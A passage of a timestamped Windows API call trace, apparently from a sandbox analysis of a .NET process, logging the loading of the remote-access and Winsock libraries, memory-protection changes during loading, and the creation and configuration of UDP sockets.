pbstr=0x41df14*="rasapi32.dll") returned 1 [0082.261] CharLowerBuffW (in: lpsz="rasapi32.dll", cchLength=0xc | out: lpsz="rasapi32.dll") returned 0xc [0082.262] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0082.262] GetLastError () returned 0x7e [0082.262] SetLastError (dwErrCode=0x7e) [0082.267] SysReAllocStringLen (in: pbstr=0x41df14*=0x0, psz="rasapi32.dll", len=0xc | out: pbstr=0x41df14*="rasapi32.dll") returned 1 [0082.267] CharLowerBuffW (in: lpsz="rasapi32.dll", cchLength=0xc | out: lpsz="rasapi32.dll") returned 0xc [0082.268] LoadLibraryExW (lpLibFileName="rasapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x74960000 [0083.360] GetLastError () returned 0x0 [0083.360] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961104, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.361] GetCurrentProcess () returned 0xffffffff [0083.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961104, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.361] GetCurrentProcess () returned 0xffffffff [0083.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961110, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.361] GetCurrentProcess () returned 0xffffffff [0083.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961110, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.361] GetCurrentProcess () returned 0xffffffff [0083.361] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961118, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.362] GetCurrentProcess () returned 0xffffffff [0083.362] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961118, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.362] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961120, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.362] GetCurrentProcess () returned 0xffffffff [0083.362] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961120, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.363] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x749611bc, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.363] GetCurrentProcess () returned 0xffffffff [0083.363] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x749611bc, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.363] GetCurrentProcess () returned 0xffffffff [0083.363] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x749611c0, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.363] GetCurrentProcess () returned 0xffffffff [0083.363] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x749611c0, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.364] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x749612d8, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.364] GetCurrentProcess () returned 0xffffffff [0083.364] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x749612d8, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.364] GetCurrentProcess () returned 0xffffffff [0083.364] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961328, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.364] GetCurrentProcess () returned 0xffffffff [0083.364] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961328, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.365] GetCurrentProcess () returned 0xffffffff [0083.365] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961334, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.365] GetCurrentProcess () returned 0xffffffff [0083.365] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961334, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.365] GetCurrentProcess () returned 0xffffffff [0083.365] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961344, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x4, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x20) returned 0x0 [0083.365] GetCurrentProcess () returned 0xffffffff [0083.365] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41defc*=0x74961344, NumberOfBytesToProtect=0x41df00, NewAccessProtection=0x20, OldAccessProtection=0x41df34 | out: BaseAddress=0x41defc*=0x74961000, NumberOfBytesToProtect=0x41df00, OldAccessProtection=0x41df34*=0x4) returned 0x0 [0083.366] GetProcAddress (hModule=0x74960000, lpProcName="RasEnumConnections") returned 0x0 [0083.367] GetProcAddress (hModule=0x74960000, lpProcName="RasEnumConnectionsW") returned 0x749674af [0083.368] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0083.368] CoTaskMemAlloc (cb=0xcc0) returned 0x739818 [0083.369] RasEnumConnectionsW (in: param_1=0x739818, param_2=0x41eb78, param_3=0x41eb7c | out: param_1=0x739818, param_2=0x41eb78, param_3=0x41eb7c) returned 0x0 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] ResetEvent (hEvent=0xb8) returned 1 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] ResetEvent (hEvent=0xb8) returned 1 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] GetCurrentThreadId () returned 0xba4 [0083.687] SetEvent (hEvent=0xbc) returned 1 [0083.687] SetEvent (hEvent=0xb8) returned 1 [0083.687] CloseHandle (hObject=0x2c8) returned 1 [0083.692] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0083.692] CoTaskMemFree (pv=0x739818) [0083.694] SysReAllocStringLen (in: pbstr=0x41dee4*=0x0, psz="ws2_32.dll", len=0xa | out: pbstr=0x41dee4*="ws2_32.dll") returned 1 [0083.694] CharLowerBuffW (in: lpsz="ws2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0083.694] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0083.694] GetLastError () returned 0x7e [0083.694] SetLastError (dwErrCode=0x7e) [0083.699] SysReAllocStringLen (in: pbstr=0x41dee4*=0x0, psz="ws2_32.dll", len=0xa | out: pbstr=0x41dee4*="ws2_32.dll") returned 1 [0083.699] CharLowerBuffW (in: lpsz="ws2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0083.699] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x0) returned 0x77230000 [0083.699] GetLastError () returned 0x0 [0083.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41decc*=0x77231128, NumberOfBytesToProtect=0x41ded0, NewAccessProtection=0x4, OldAccessProtection=0x41df04 | out: BaseAddress=0x41decc*=0x77231000, NumberOfBytesToProtect=0x41ded0, OldAccessProtection=0x41df04*=0x20) returned 0x0 [0083.700] GetCurrentProcess () returned 0xffffffff [0083.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41decc*=0x77231128, NumberOfBytesToProtect=0x41ded0, NewAccessProtection=0x20, OldAccessProtection=0x41df04 | out: BaseAddress=0x41decc*=0x77231000, NumberOfBytesToProtect=0x41ded0, OldAccessProtection=0x41df04*=0x4) returned 0x0 [0083.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41decc*=0x77231224, NumberOfBytesToProtect=0x41ded0, NewAccessProtection=0x4, OldAccessProtection=0x41df04 | out: BaseAddress=0x41decc*=0x77231000, NumberOfBytesToProtect=0x41ded0, OldAccessProtection=0x41df04*=0x20) returned 0x0 [0083.701] GetCurrentProcess () returned 0xffffffff [0083.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41decc*=0x77231224, NumberOfBytesToProtect=0x41ded0, NewAccessProtection=0x20, OldAccessProtection=0x41df04 | out: BaseAddress=0x41decc*=0x77231000, NumberOfBytesToProtect=0x41ded0, OldAccessProtection=0x41df04*=0x4) returned 0x0 [0083.701] GetCurrentProcess () returned 0xffffffff [0083.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41decc*=0x7723123c, NumberOfBytesToProtect=0x41ded0, NewAccessProtection=0x4, OldAccessProtection=0x41df04 | out: BaseAddress=0x41decc*=0x77231000, NumberOfBytesToProtect=0x41ded0, OldAccessProtection=0x41df04*=0x20) returned 0x0 [0083.701] GetCurrentProcess () returned 0xffffffff [0083.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41decc*=0x7723123c, NumberOfBytesToProtect=0x41ded0, NewAccessProtection=0x20, OldAccessProtection=0x41df04 | out: BaseAddress=0x41decc*=0x77231000, NumberOfBytesToProtect=0x41ded0, OldAccessProtection=0x41df04*=0x4) returned 0x0 [0083.702] GetProcAddress (hModule=0x77230000, lpProcName="WSAStartup") returned 0x77233ab2 [0083.702] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x41e960 | out: lpWSAData=0x41e960) returned 0 [0083.711] GetProcAddress (hModule=0x77230000, lpProcName="WSASocket") returned 0x0 [0083.712] GetProcAddress (hModule=0x77230000, lpProcName="WSASocketW") returned 0x77233cd3 [0083.712] GetProcAddress (hModule=0x77230000, lpProcName="setsockopt") returned 0x772341b6 [0083.712] GetProcAddress (hModule=0x77230000, lpProcName="WSAEventSelect") returned 0x7723648f [0083.712] GetProcAddress (hModule=0x77230000, lpProcName="ioctlsocket") returned 0x77233084 [0083.713] GetProcAddress (hModule=0x77230000, lpProcName="closesocket") returned 0x77233918 [0083.714] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2e4 [0084.362] setsockopt (s=0x2e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0084.362] closesocket (s=0x2e4) returned 0 [0084.363] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2e4 [0084.442] setsockopt (s=0x2e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0084.442] closesocket (s=0x2e4) returned 0 [0084.443] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2e4 [0084.444] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e8 [0084.444] GetProcAddress (hModule=0x77230000, lpProcName="ioctlsocket") returned 0x77233084 [0084.444] ioctlsocket (in: s=0x2e4, cmd=-2147195266, argp=0x41eb80 | out: argp=0x41eb80) returned 0 [0084.445] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2ec [0084.445] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2f0 [0084.445] ioctlsocket (in: s=0x2ec, cmd=-2147195266, argp=0x41eb80 | out: argp=0x41eb80) returned 0 [0084.446] GetProcAddress (hModule=0x77230000, lpProcName="WSAIoctl") returned 0x77232fe7 [0084.446] WSAIoctl (in: s=0x2e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x41eb68, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x41eb68, lpOverlapped=0x0) returned -1 [0084.451] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessage") returned 0x0 [0084.454] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0084.454] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41e898, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0084.462] GetProcAddress (hModule=0x77230000, lpProcName="WSAEventSelect") returned 0x7723648f [0084.462] WSAEventSelect (s=0x2e4, hEventObject=0x2e8, lNetworkEvents=512) returned 0 [0084.462] WSAIoctl (in: s=0x2ec, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x41eb68, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x41eb68, lpOverlapped=0x0) returned -1 [0084.462] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41e898, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0084.462] WSAEventSelect (s=0x2ec, hEventObject=0x2f0, lNetworkEvents=512) returned 0 [0084.462] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f8 [0084.463] GetProcAddress (hModule=0x74960000, lpProcName="RasConnectionNotification") returned 0x0 [0084.463] GetProcAddress (hModule=0x74960000, lpProcName="RasConnectionNotificationW") returned 0x749631f5 [0084.463] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x2f8, param_3=0x3) returned 0x0 [0084.463] SysReAllocStringLen (in: pbstr=0x41eabc*=0x0, psz="RASMAN.DLL", len=0xa | out: pbstr=0x41eabc*="RASMAN.DLL") returned 1 [0084.463] CharLowerBuffW (in: lpsz="RASMAN.DLL", cchLength=0xa | out: lpsz="rasman.dll") returned 0xa [0084.463] LoadLibraryW (lpLibFileName="RASMAN.DLL") returned 0x75220000 [0084.464] GetLastError () returned 0x0 [0084.464] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210a0, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.464] GetCurrentProcess () returned 0xffffffff [0084.464] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210a0, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.464] GetCurrentProcess () returned 0xffffffff [0084.465] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210ac, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.465] GetCurrentProcess () returned 0xffffffff [0084.465] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210ac, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.465] GetCurrentProcess () returned 0xffffffff [0084.465] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210b0, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.465] GetCurrentProcess () returned 0xffffffff [0084.465] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210b0, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.466] GetCurrentProcess () returned 0xffffffff [0084.466] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210b4, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.466] GetCurrentProcess () returned 0xffffffff [0084.466] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210b4, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.466] GetCurrentProcess () returned 0xffffffff [0084.466] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210b8, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.467] GetCurrentProcess () returned 0xffffffff [0084.467] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210b8, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.467] GetCurrentProcess () returned 0xffffffff [0084.467] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210bc, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.467] GetCurrentProcess () returned 0xffffffff [0084.467] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210bc, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.468] GetCurrentProcess () returned 0xffffffff [0084.468] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210d4, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.468] GetCurrentProcess () returned 0xffffffff [0084.468] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x752210d4, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.468] GetCurrentProcess () returned 0xffffffff [0084.468] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x75221108, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.469] GetCurrentProcess () returned 0xffffffff [0084.469] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x75221108, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.469] GetCurrentProcess () returned 0xffffffff [0084.469] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x7522113c, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x4, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x20) returned 0x0 [0084.469] GetCurrentProcess () returned 0xffffffff [0084.469] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea9c*=0x7522113c, NumberOfBytesToProtect=0x41eaa0, NewAccessProtection=0x20, OldAccessProtection=0x41ead4 | out: BaseAddress=0x41ea9c*=0x75221000, NumberOfBytesToProtect=0x41eaa0, OldAccessProtection=0x41ead4*=0x4) returned 0x0 [0084.470] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ad4, cbMultiByte=11, lpWideCharStr=0x41d9c0, cchWideChar=2047 | out: lpWideCharStr="rtutils.dllAථ盂\x01") returned 11 [0084.470] SysReAllocStringLen (in: pbstr=0x41e9c4*=0x0, psz="rtutils.dll", len=0xb | out: pbstr=0x41e9c4*="rtutils.dll") returned 1 [0084.470] CharLowerBuffW (in: lpsz="rtutils.dll", cchLength=0xb | out: lpsz="rtutils.dll") returned 0xb [0084.471] LoadLibraryExA (lpLibFileName="rtutils.dll", hFile=0x0, dwFlags=0x0) returned 0x74950000 [0084.471] GetLastError () returned 0x0 [0084.471] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951044, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.471] GetCurrentProcess () returned 0xffffffff [0084.471] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951044, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.472] GetCurrentProcess () returned 0xffffffff [0084.472] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951064, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.472] GetCurrentProcess () returned 0xffffffff [0084.472] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951064, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.472] GetCurrentProcess () returned 0xffffffff [0084.472] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951090, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.473] GetCurrentProcess () returned 0xffffffff [0084.473] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951090, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.473] GetCurrentProcess () returned 0xffffffff [0084.473] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951094, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x20) returned 0x0 [0084.473] GetCurrentProcess () returned 0xffffffff [0084.473] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x74951094, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x20, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, OldAccessProtection=0x41e9e8*=0x4) returned 0x0 [0084.474] GetCurrentProcess () returned 0xffffffff [0084.474] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9b0*=0x749510ac, NumberOfBytesToProtect=0x41e9b4, NewAccessProtection=0x4, OldAccessProtection=0x41e9e8 | out: BaseAddress=0x41e9b0*=0x74951000, NumberOfBytesToProtect=0x41e9b4, 